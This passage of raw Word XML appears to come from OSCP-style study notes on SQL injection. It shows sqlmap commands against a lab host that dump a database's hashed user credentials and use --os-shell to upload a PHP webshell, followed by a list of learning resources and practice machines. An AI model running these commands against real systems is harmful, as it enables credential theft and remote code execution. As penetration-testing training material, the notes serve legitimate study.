        <w:t xml:space="preserve">To dump the entire database, including user credentials, we can run the same command as earlier with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4165600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="297" name="image288.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image288.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50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80E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180F">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we're dealing with a blind time-based SQLi vulnerability, the process of fetching the entire database's table is quite slow, but eventually we manage to obtain all users' hashed credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001810">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another sqlmap core feature is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, which provides us with a full interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001811">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to their generally high latency, time-based blind SQLi are not ideal when interacting with a shell, so we'll use the first UNION-based SQLi example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001812">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to intercept the POST request via Burp and save it as a local text file on our Kali VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001813">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="523" name="image505.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image505.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50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814">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001815">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can invoke </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, using our file containing the POST request as an argument. We also need to indicate which parameter is vulnerable to sqlmap, in our case </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">item</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we'll include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--os-shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with the custom writable folder we found earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001816">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001817">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001818">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="8077200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="553" name="image554.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image554.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId502"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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1819">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once sqlmap confirms the vulnerability, it prompts us for the language the web application is written in, which is PHP in this case. Next, sqlmap uploads the webshell to the specified web folder and returns the interactive shell, from which we can issue regular system commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmjz16feiybi" w:id="200"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap and SQL injections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000181F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Good Resources for SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001820">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId503">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001821">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId504">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=1nJgupaUPEQ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001822">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001823">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId505">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001824">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001825">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId506">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger SQL injections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001826">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId507">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Port Swigger SQL commands cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001827">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001828">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3306</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, PostgreSQL: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5432</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Oracle Database: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1521</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, MariaDB (a MySQL fork): </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3306, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001829">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="528"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB and MySQL are almost the same and usually you can use MySQL tools for MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More about SQL Injections can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId508">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">InsanityHosting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000182D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId509">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust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82E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId510">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</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82F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Manual Code Execution Section (from OSCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001830">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Automated Code Execution Section (from OSCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Blind SQL Injection Section (from OSCP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001832">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001833">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More SQLmap practice can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001834">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId511">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Butch</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835">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001836">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
